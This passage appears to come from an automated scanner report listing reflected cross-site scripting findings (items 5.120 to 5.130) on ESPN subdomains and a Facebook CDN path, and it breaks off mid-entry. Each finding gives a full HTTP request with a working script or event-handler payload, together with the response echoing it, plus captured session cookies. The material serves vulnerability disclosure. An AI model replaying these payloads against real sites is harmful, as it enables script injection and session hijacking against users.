Last-Modified: Sat, 06 Nov 2010 23:28:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Cache-Expires: Sat, 06 Nov 2010 23:33:19 GMT
Content-Length: 81915
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Serbia Football / S
...[SNIP]...
<a href="/worldcup2010/team?team=6757&_slug_=serbia70663"><a>50054d97128&topId=797998&linktext=Serbia+coach+Radomir+Antic+wants+to+stay">
...[SNIP]...

5.120. http://soccernet.espn.go.com/worldcup2010/team/_/team/6757/serbia [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/6757/serbia

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82ccb"><a>dea0025a04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/6757/serbia?82ccb"><a>dea0025a04=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:26:06 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:26:06 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN19
Cache-Expires: Sat, 06 Nov 2010 23:31:06 GMT
Content-Length: 82015
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Serbia Football / S
...[SNIP]...
<a href="/worldcup2010/team?team=6757&82ccb"><a>dea0025a04=1&_slug_=serbia&82ccb">
...[SNIP]...

5.121. http://sports.espn.go.com/keyword/search [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /keyword/search

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cab3f<script>alert(1)</script>2f1f80457b3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /keyword/searchcab3f<script>alert(1)</script>2f1f80457b3 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289019231610; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020213231%7C1383628213231%3B%20s_c24_s%3DFirst%2520Visit%7C1289022013231%3B%20s_gpv_pn%3Dsoccernet%253Afrontpage%253Afrontpage%7C1289022013456%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; AcceptCookies=yes; CRBLM=CBLM-001:; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 136
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
X-UA-Compatible: IE=EmulateIE7

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/keyword/searchcab3f<script>alert(1)</script>2f1f80457b3</BODY></HTML>

5.122. http://static.ak.fbcdn.net/connect.php/js/FB.Share [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect.php/js/FB.Share

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f5fd1<img%20src%3da%20onerror%3dalert(1)>6deddee5e17 was submitted in the REST URL parameter 3. This input was echoed as f5fd1<img src=a onerror=alert(1)>6deddee5e17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /connect.php/js/FB.Sharef5fd1<img%20src%3da%20onerror%3dalert(1)>6deddee5e17 HTTP/1.1
Host: static.ak.fbcdn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
X-Cnection: close
Expires: Sat, 06 Nov 2010 17:21:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 06 Nov 2010 17:21:15 GMT
Content-Length: 88
Connection: close

/* "FB.Sharef5fd1<img src=a onerror=alert(1)>6deddee5e17" is not a valid component. */

5.123. http://streak.espn.go.com/createOrUpdateEntry [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://streak.espn.go.com
Path:   /createOrUpdateEntry

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ceec<script>alert(1)</script>05c8d5071b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /createOrUpdateEntry2ceec<script>alert(1)</script>05c8d5071b9 HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response (redirected)

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 144
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/createOrUpdateEntry2ceec<script>alert(1)</script>05c8d5071b9</BODY></HTML>

5.124. http://streak.espn.go.com/en/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://streak.espn.go.com
Path:   /en/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 101c7<script>alert(1)</script>0c34eaeab34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en101c7<script>alert(1)</script>0c34eaeab34/ HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response (redirected)

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 128
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/en101c7<script>alert(1)</script>0c34eaeab34/</BODY></HTML>

5.125. http://streak.espn.go.com/en/conversation [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://streak.espn.go.com
Path:   /en/conversation

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ebfd3<script>alert(1)</script>d621151af8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enebfd3<script>alert(1)</script>d621151af8a/conversation HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response (redirected)

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 140
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/enebfd3<script>alert(1)</script>d621151af8a/conversation</BODY></HTML>

5.126. http://streak.espn.go.com/en/conversation [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://streak.espn.go.com
Path:   /en/conversation

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c6338<script>alert(1)</script>735d75941d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/conversationc6338<script>alert(1)</script>735d75941d4 HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 137
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/conversationc6338<script>alert(1)</script>735d75941d4</BODY></HTML>

5.127. http://streak.espn.go.com/en/createOrUpdateEntry [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://streak.espn.go.com
Path:   /en/createOrUpdateEntry

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 71549<script>alert(1)</script>907b7ff7526 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en71549<script>alert(1)</script>907b7ff7526/createOrUpdateEntry HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response (redirected)

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 147
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/en71549<script>alert(1)</script>907b7ff7526/createOrUpdateEntry</BODY></HTML>

5.128. http://streak.espn.go.com/en/createOrUpdateEntry [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://streak.espn.go.com
Path:   /en/createOrUpdateEntry

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a058b<script>alert(1)</script>6b3ce37571f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/createOrUpdateEntrya058b<script>alert(1)</script>6b3ce37571f HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 144
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/createOrUpdateEntrya058b<script>alert(1)</script>6b3ce37571f</BODY></HTML>

5.129. http://streak.espn.go.com/en/entry [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://streak.espn.go.com
Path:   /en/entry

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 67f2a<script>alert(1)</script>2fd0abe5ee5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en67f2a<script>alert(1)</script>2fd0abe5ee5/entry HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response (redirected)

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 133
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/en67f2a<script>alert(1)</script>2fd0abe5ee5/entry</BODY></HTML>

5.130. http://streak.espn.go.com/en/entry [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
